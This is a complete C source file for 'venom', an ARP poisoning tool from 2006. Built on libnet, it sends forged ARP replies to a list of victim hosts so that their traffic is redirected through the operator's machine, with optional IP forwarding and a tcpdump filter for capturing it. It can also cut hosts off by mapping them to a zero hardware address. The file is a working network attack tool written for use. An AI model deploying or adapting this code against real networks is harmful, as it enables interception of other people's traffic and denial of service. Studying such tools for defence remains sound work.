/*               venom - an arp poisoning tool               */

/* Marcus Fritzsch, http://fritschy.de, 2006-04-21           *
 * this code is free software and licensed under the GNU GPL *
 * v2 or any later version at your option                    */

/**
 * @file venom.c
 * @brief Main module of venom, an arp-poisoning tool
 * @author Marcus Fritzsch
 * @date 2006-04-21
 * @see http://en.wikipedia.org/wiki/ARP_poisoning
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <string.h>
#include <getopt.h>
#include <assert.h>
#include <stdarg.h>
#include <errno.h>
#include <time.h>
#include <signal.h>
#include <ctype.h>

#include <arpa/inet.h>

#if defined(__linux__)
# include <linux/unistd.h>
# include <linux/sysctl.h>
_syscall1(int, _sysctl, struct __sysctl_args *, args)
#endif

#include <libnet.h>

#ifdef USE_PERLIN
# include "noise.h"
#endif

#include "arp.h"

/// path separator string
#define SEP             "/"
/// path separator char
#define SEPC            SEP[0]

#ifndef DEVICE_NAME_SIZE
# define DEVICE_NAME_SIZE 50 /* linux/device.h */
#endif

/// holds victim iformation, i.e. DoS flag and ip address
typedef struct s_victim
{
  /// 1 if this is a DoS victim, 0 otherwise
  int       dos;
  /// the victims ip, obviously
  u_int32_t ip;
} victim_t;

typedef struct libnet_ether_addr ethera;

/// contains the program name after init
char * Program;

/// may contain an interface to bind to ecplicitly
char * Interface;

/// Array of victims to attack
victim_t * Victims;

/// if 1 be more verbose, otherwise stay quiet
int Verbose;

/// number of victims
int Dose;

/// end-status, set by sighnd(int), 1 -> finishes spoof loop
int Enough;

/// delay between arp sends in seconds, if zero 0.1 seconds is used
int Delay;

/// if 1 a spinner is shown
int Spinner;

/// the target hw ether address used for arp DoS
ethera SpoofedHWAddr;

/// if 1 SpoofedHWAddr contains a user supplied value
int HaveSpoofedHWAddr;

/// show tcpdump match to intercept all relevant (i.e. not arp,
/// not outgoing...) packets
int ShowTCPDumpMatch;

/**
 * print an error message
 *
 * message is a printf format string
 *
 * @param f format strting
 * @param ... printf-like parameters
 */
void
warn (char * f, ...)
{
  va_list l;
  fprintf (stderr, "%s: WARN: ", Program);
  va_start (l, f);
  vfprintf (stderr, f, l);
  va_end (l);
}

/**
 * print an error message and bail out (i.e. exit (1))
 *
 * message is a printf format string
 *
 * @param f format strting
 * @param ... printf-like parameters
 */
void
bail (char * f, ...)
{
  va_list l;
  fprintf (stderr, "%s: ERR: ", Program);
  va_start (l, f);
  vfprintf (stderr, f, l);
  va_end (l);
  exit (EXIT_FAILURE);
}

/**
 * print an info message
 *
 * message is a printf format string
 *
 * @param f format strting
 * @param ... printf-like parameters
 */
void
info (char * f, ...)
{
  va_list l;
  fprintf (stderr, "%s: ", Program);
  va_start (l, f);
  vfprintf (stderr, f, l);
  va_end (l);
}

/**
 * Print a verbose help message
 */
void
help ()
{
  fprintf (stderr,
    "usage: %s [-vfshm] [-d seconds] [-i interface] "
    "[-x xhost1 -x xhost2 ..]\n"
    "               [-D hwether]\n"
    "               host1 host2 host...\n\n"
    "\t-v    be verbose (some)\n"
    "\t-f    enable ip forwarding, default no\n"
    "\t-s    enable the rss (really slick spinner), default no\n"
    "\t-h    show this message\n"
    "\t-d    delay between arp sends in seconds [0..], default 1\n"
    "\t-x    hosts to effectively DoS from the other DoS'ed hosts\n"
    "\t-D    Hardware address to be used, instead of the own one\n"
    "\t-i    interface to use (if having problems), default none\n"
    "\t-m    show tcpdump match for relevant packets (i.e. not\n"
    "\t      arp and not outgoing from poisoned hosts)\n\n"
    "There may be N hosts - effectively N should not be greater than 5\n",
    Program);
  exit (1);
}

/**
 * alloc n bytes, assert that the returning ptr != NULL
 * allocated memory will not be initiallized
 * 
 * @param n bytes to allocate
 * @return ptr to the newly allocated memory
 */
void *
xalloc (size_t n)
{
  void * p = malloc (n);
  assert (!"OUT OF MEMORY" || p != NULL);
  return p;
}

/**
 * realloc to n bytes, assert that the returning ptr is valid
 *
 * @param p chunk to realloc on
 * @param n n bytes to realloc
 * @return ptr to reallocated memory (maybe freed memory too!)
 */
void *
xrealloc (void * p, size_t n)
{
  p = realloc (p, n);
  if (n) assert (!"OUT OF MEMORY" || p != NULL);
  return p;
}

/**
 * Allocate memory for the string, zero it out and copy
 * the string over... all in one place.
 *
 * @param dst *ptr where the ptr shall be stored
 * @param src string to copy over
 */
void
allocpy (char ** dst, char * src)
{
  int len = strlen (src);
  *dst = xalloc (len+1);
  bzero (*dst, len+1);
  strncpy (*dst, src, len);
}

/**
 * determine the network format of the dotted quad ipv4 address
 *
 * @param s ip address as dotted quad string
 * @return network byte order uint32, 0 if inet_aton(3) fails
 */
u_int32_t
get_inet4_addr (char * s)
{
  struct in_addr ia;
  if (! inet_aton (s, &ia))
    {
      warn ("inet_aton failed on %s\n", s);
      return 0;
    }
  return ia.s_addr;
}

/**
 * print a hardware ethernet addres
 *
 * @param stream ptr to the stream it should be printed to
 * @param lnea ethera that should be printed
 */
void
print_ether_addr (FILE * stream, ethera lnea)
{
  int j;
  for (j = 0; j < 6; j++)
    fprintf (stream, "%02x%c", lnea.ether_addr_octet [j], j==5?' ':':');
}

/**
 * on linux enable ipv4 forwarding through /proc, else print a
 * warning.
 *
 * XXX: there may come more ones i boot *bsd
 */
void
enable_ipv4_ipforward ()
{
#ifdef __linux__
  /* see sysctl(2) and linux/sysctl.h */
  void * oldval = NULL;
  int newval = 1;
  size_t oldvals = 0;
  int name [] = { CTL_NET, NET_IPV4, NET_IPV4_FORWARD };
  struct __sysctl_args sa = {
	&name[0],
	3,
	oldval,
	&oldvals,
	&newval,
	sizeof (newval)
  };
  if (_sysctl (&sa) < 0)
    warn ("Failed enabling ipv4 ip_forward\n");
#else
  warn ("%s:%d: Don't know how to enable ipv4 forwarding.\n",
      __FILE__, __LINE__);
#endif /* __linux__ */
}

/**
 * internal, registered with atexit() to cleanup
 */
void
cleanup ()
{
  free (Victims);
}

/**
 * Convert the given hardware address from string representation
 * into a system usable 6 byte rep.
 *
 * Valid hardware address formats are
 *   XX:XX:XX:XX:XX:XX or XX-XX-XX-XX-XX-XX
 *
 * XXX: same thing using *scanf class of functions:
 *   *scanf("%02x:%02x:%02x:%02x:%02x:%02x",...)
 * 
 * I DON'T LIKE *scanf
 *
 * @param in string representation of hw address
 * @param retbuf hw address will be written here
 * @return 0 on success, -1 on failure
 */
int
to6bytes (char * in, ethera * retbuf)
{
  int octets = 0;
  char * hwether;
  char * tmp = hwether, * new, * save;

  allocpy (&hwether, in);

  for (octets = 0, tmp = hwether; (new = strtok_r (tmp, ":-", &save));
      tmp = NULL, octets++)
      retbuf->ether_addr_octet [octets] = strtol (new, NULL, 16);

  free (hwether);

  if (octets != 6)
    return -1;

  return 0;
}

/**
 * internal signal hanlder, sets Enough to signal the users
 * whish to exit (see Enough and envenom_hosts ())
 *
 * @param sig signal number
 */
void
sighnd (int sig)
{
  if (Verbose)
    {
      if (Spinner)
	fprintf (stderr, "\n");
      info ("Got signal %d.\n", sig);
    }
  Enough = 1;
}

/**
 * send an icmpv4 echo-request ping to the given ipv4 address
 *
 * @param ip4 host to send ping to, name or dotted quad notation
 */
void
send_ping4 (u_int32_t ip4)
{
  char errb [LIBNET_ERRBUF_SIZE];
  char * pl = "knock knock neo...";
  libnet_t * lln;
  u_int32_t myip4;
  libnet_ptag_t t;
  int bw;
  int pll = strlen (pl);

  if ((lln = libnet_init (LIBNET_RAW4, Interface, errb)) == NULL)
    bail ("Could not init libnet for raw_ipv4: %s.\n", errb);

  myip4 = libnet_get_ipaddr4 (lln);

  if ((t = libnet_build_icmpv4_echo (ICMP_ECHO, 0, 0, 0x30, 0x30,
      (void*)pl, pll, lln, 0)) == -1)
    bail ("libnet: cannot build icmp4 hdr: %s.\n",
	libnet_geterror(lln));

  if ((t = libnet_build_ipv4 (
	  LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H, /* len */
	  0, 0x30, 0, 64, IPPROTO_ICMP, /* tos id mf ttl proto */
	  0, myip4, ip4, NULL, 0, lln, 0)) == -1) /* cksum src dst payload
						     payload len libnet * */
    bail ("libnet: cannot build ipv4 hdr: %s.\n",
	libnet_geterror(lln));

  if ((bw = libnet_write (lln)) == -1)
    bail ("libnet: could not write: %s.\n",
	libnet_geterror (lln));

  libnet_destroy (lln);

  if (Verbose)
    info ("send_ping4: sent a ping to %08x.\n", ntohl (ip4));
}

/**
 * determine the ethernet address of the given ipv4 address
 *
 * This function works as follows:
 *  1:  try arp_cache_lookup ()
 *      if it fails, send a ping to the ip and wait
 *      a moment, repeat this up to 10 times
 *  2:  arp_cache_lookup () was a success, return
 *      the retrieved hwether address
 *
 * This function waits up to 0.1 seconds for an arp cache
 * entry to become available.
 *
 * @param ip determine ethernet address of this one
 * @param ea ethernet address is stored here
 * @return -1 on error, else 0
 */
int
get_hw_addr (u_int32_t ip, ethera * ea)
{
  int waits = 10;
  int sent_ping = 0;
  int ret;
  static ethera zero = {{ 0,0, 0,0, 0,0 }};

  while (waits--)
    {
      struct timeval tv = { 0, 10000 };

      ret = arp_cache_lookup (ip, (struct ether_addr*) ea);
      if (ret == 0 && memcmp (ea, &zero, 6))
	{
	  if (Verbose)
	    {
	      info ("get_hw_addr: retrieved hwether of %08x: ", ntohl (ip));
	      print_ether_addr (stderr, *ea);
	      fprintf (stderr, "\n");
	    }
	  return 0;
	}

      if (! sent_ping)
	{
	  sent_ping = 1;
	  send_ping4 (ip);
	}

      select (0, NULL, NULL, NULL, &tv);
    }

  return -1;
}

/**
 * initialization of program wide stati
 *
 * @param argcp pointer to argc
 * @param argv self-explaining
 *
 * @return not usable right now
 */
int
init_venom (int * argcp, char ** argv)
{
  char * tmp;
  int c, t;

  ShowTCPDumpMatch = HaveSpoofedHWAddr = Dose = Enough = Verbose = 0;
  Delay = 1;
  Spinner = 0;
  Victims = NULL;

  bzero (&SpoofedHWAddr, sizeof (SpoofedHWAddr));

  tmp = strrchr (*argv, SEPC);
  tmp = tmp ? tmp+1 : *argv;
  Program = tmp;

  if (geteuid () != 0)
    bail ("Need root privileges.\n");

  signal (SIGINT, sighnd);
  signal (SIGHUP, sighnd);
  signal (SIGTERM, sighnd);

  while ((c = getopt (*argcp, argv, "d:i:D:x:sfvhm")) != -1)
    {
      switch (c)
	{
	case 'i':
	  Interface = optarg;
	  break;

	case 'd':
	  if (! isdigit (optarg [0]))
	    bail ("option -d argument not a valid delay.\n");
	  t = atoi (optarg);
	  if (t < 0)
	    t = 0;
	  Delay = t;
	  break;

	case 'f':
	  enable_ipv4_ipforward ();
	  break;

	case 'v':
	  Verbose = 1;
	  break;

	case 's':
	  Spinner = 1;
	  break;

	case 'h':
	  help ();
	  exit (0);
	  break;

	case 'x':
	  Dose++;
	  Victims = xrealloc (Victims, Dose * sizeof (victim_t));
	  Victims [Dose-1].dos = 1;
	  Victims [Dose-1].ip = get_inet4_addr (optarg);
	  if (Victims [Dose-1].ip == 0)
	    bail ("option -x argument not a valid ipv4 address.\n");
	  send_ping4 (Victims [Dose-1].ip);
	  break;

	case 'D':
	  if (to6bytes (optarg, &SpoofedHWAddr) == -1)
	    bail ("option -D argument not a valid hwether address.\n");
	  info ("build hwether address %s\n", optarg);
	  HaveSpoofedHWAddr = 1;
	  break;

	case 'm':
	  ShowTCPDumpMatch = 1;
	  break;
	}
    }

  *argcp -= optind;
  argv   += optind;

  if (Dose + *argcp < 2)
    bail ("No victims hosts?\n");

  Dose += *argcp;
  Victims = xrealloc (Victims, Dose * sizeof (victim_t));
  for (c = Dose - *argcp; c < Dose; c++)
    {
      Victims [c].ip = get_inet4_addr (argv [c - (Dose - *argcp)]);
      Victims [c].dos = 0;
      if (Victims [c].ip == 0)
	bail ("host %s not a valid ipv4 address.\n",
	    argv [c - (Dose - *argcp)]);
      send_ping4 (Victims [c].ip);
    }

    {
      /* wait a moment for the arp cache to fill up */
      struct timeval tv = { 0, 100000 };
      select (0, NULL, NULL, NULL, &tv);
    }

  /*
   * this tcpdump match output does nothing more then showing
   * a dumb match of non arp non-outgoing packets...
   *
   * it's for convenience, copy'n paste if you like
   */
  if (ShowTCPDumpMatch)
    {
      ethera ea;
      libnet_t * l;
      char errb [LIBNET_ERRBUF_SIZE];

      if (! HaveSpoofedHWAddr)
	{
	  if ((l = libnet_init (LIBNET_LINK_ADV, Interface, errb))
	      == NULL)
	    bail ("libnet: could not set up context: %s", errb);

	  ea = *libnet_get_hwaddr (l);

	  libnet_destroy (l);
	}
      else
	ea = SpoofedHWAddr;

      fprintf (stderr, "tcpdump match: not arp and ether host ");
      print_ether_addr (stderr, ea);
      fprintf (stderr, "and \\( host ");
      for (c = 0; c < Dose; c++)
	{
	  fprintf (stderr, "%s ",
	      inet_ntoa ((struct in_addr) { Victims [c].ip }));
	  if (c != Dose - 1)
	    fprintf (stderr, "or host ");
	}
      fprintf (stderr, "\\)\n");
    }

  atexit (cleanup);

  return 0;
}

/**
 * send out crafted arp replys to the victims, ending when Enough is
 * set (through a signal, see sighnd(int))
 */
void
envenom_hosts ()
{
  static char * banner = "codito, ergo sum";
  int banner_s = strlen (banner);
  char errb [LIBNET_ERRBUF_SIZE];
  libnet_ptag_t t;
  u_int32_t myip;
  ethera spoofedhw;
  int written, have_my_info = 0;
  int tgt, ctr = 0;
  libnet_t ** llna = xalloc (Dose * (Dose+1) * sizeof (libnet_t *));
  ethera thw;
  static ethera zerohw = {{ 0,0, 0,0, 0,0 }};

#ifndef USE_PERLIN
  int spinctr = 0, spindir = 1;
#endif

  for (tgt=0; tgt < Dose; tgt++)
    {
      int t2, t3;
      if (get_hw_addr (Victims [tgt].ip, &thw) == -1)
	bail ("Could not lookup hwether address of %08x.\n",
	    Victims [tgt].ip);

      for (t2 = (tgt+1) % Dose, t3 = 0; t3 < Dose - 1;
	  t2++, t2%=Dose, t3++, ctr++)
	{
	  libnet_t * lln;

	  if ((lln = libnet_init (LIBNET_LINK_ADV, Interface, errb))
	      == NULL)
	    bail ("Could not init libnet for arp-req: %s.\n", errb);

	  if (! have_my_info)
	    {
	      if (HaveSpoofedHWAddr)
		spoofedhw = SpoofedHWAddr;
	      else
		spoofedhw = *libnet_get_hwaddr (lln);
	      myip = libnet_get_ipaddr4 (lln);
	      have_my_info = !have_my_info;
	    }

#ifdef USE_LIBNET_AUTOBUILD
	  if ((t = libnet_autobuild_arp (ARPOP_REPLY,
		  Victims[tgt].dos
		    ? (u_int8_t*) &zerohw
		    : (u_int8_t*) &spoofedhw,
		  (u_int8_t*) &Victims[t2].ip,
		  (u_int8_t*) &thw,
		  (u_int8_t*) &Victims[tgt].ip,
		  lln)) == -1)
	    bail ("libnet: Could not build arp packet: %s.\n",
		libnet_geterror (lln));

	  if ((t = libnet_autobuild_ethernet (
		  (u_int8_t *) &thw,
		  ETHERTYPE_ARP, lln)) == -1)
	    bail ("libnet: Could not build eth packet: %s.\n",
		libnet_geterror (lln));

#else // !USE_LIBNET_AUTOBUILD

	  /* XXX i do like it the hard way */
	  if ((t = libnet_build_arp (
		  ARPHRD_ETHER,
		  ETHERTYPE_IP,
		  ETHER_ADDR_LEN,
		  sizeof (u_int32_t),
		  ARPOP_REPLY,
		  Victims[tgt].dos
		    ? (u_int8_t*) &zerohw
		    : (u_int8_t*) &spoofedhw,
		  (u_int8_t*) &Victims[t2].ip,
		  (u_int8_t*) &thw,
		  (u_int8_t*) &Victims[tgt].ip,
		  (u_int8_t*) banner,
		  banner_s,
		  lln,
		  0)) == -1)
	    bail ("libnet: Could not build arp packet: %s.\n",
		libnet_geterror (lln));

	  if ((t = libnet_build_ethernet (
		  (u_int8_t *) &thw,
		  (u_int8_t*) &spoofedhw,
		  ETHERTYPE_ARP,
		  NULL,
		  0,
		  lln,
		  0)) == -1)
	    bail ("libnet: Could not build eth packet: %s.\n",
		libnet_geterror (lln));
#endif // !USE_LIBNET_AUTOBUILD

	  llna [ctr] = lln;
	}
    }

  if (Verbose)
    info ("envenom_hosts: spreading venom every %0.1f second%s.\n",
	Delay ? Delay : 0.1f, Delay == 1 ? "" : "s");

  while (! Enough)
    {
      int sa;
      int i;

      for (i = 0; i < Dose * (Dose - 1); i++)
	{
	  if ((written = libnet_write (llna [i])) == -1)
	    bail ("libnet: Could not write packet: %s.\n",
		libnet_geterror(llna [i]));
	}

      if (Spinner)
	for (i = 0; (i < Delay * 10 || (!Delay && i < 1)) && !Enough; i++)
	  {
	    struct timeval tv = { 0, 100000 };

#ifdef USE_PERLIN
	    static double t = 0.0;
	    double x;
	    fprintf (stderr, "\r");
	    for (sa = 0; sa < 72; sa++)
	      {
		x = sa;
		x /= 12.5;
		x = fnoise3 (x, t, 0);
		fprintf (stderr, "%c", " .oO"[(int)(((x+1)/2)*4.1)]);
	      }

	    t += 1 / 12.5;

#else

	    fprintf (stderr, "\r");
	    for (sa = 0; sa < spinctr; sa++)
	      fprintf (stderr, ".");
	    fprintf (stderr, "oOo");
	    for (sa = 69 - spinctr; sa >= 0; sa--)
	      fprintf (stderr, ".");

	    spinctr += spindir;

	    if (spinctr == 69+1 || spinctr == 0)
	      spindir = -spindir;
#endif /* USE_PERLIN */

	    select (0, NULL, NULL, NULL, &tv);
	  }
      else
	{
	  struct timeval tv = { Delay ? Delay : 0, !Delay ? 100000 : 0 };
	  select (0, NULL, NULL, NULL, &tv);
	}
    }

  for (tgt = 0; tgt < Dose * (Dose - 1); tgt++)
    libnet_destroy (llna [tgt]);
  free (llna);
}

int
main (int argc, char ** argv)
{
  init_venom (&argc, argv);
  envenom_hosts ();
  return EXIT_SUCCESS;
}

/**This must remain at the end of the file.**********
 * vim600:set sw=2 ts=8 fdm=marker fmr=,:     *
 * vim600:set cindent cinoptions={1s,>2s,^-1s,n-1s: *
 ****************************************************/
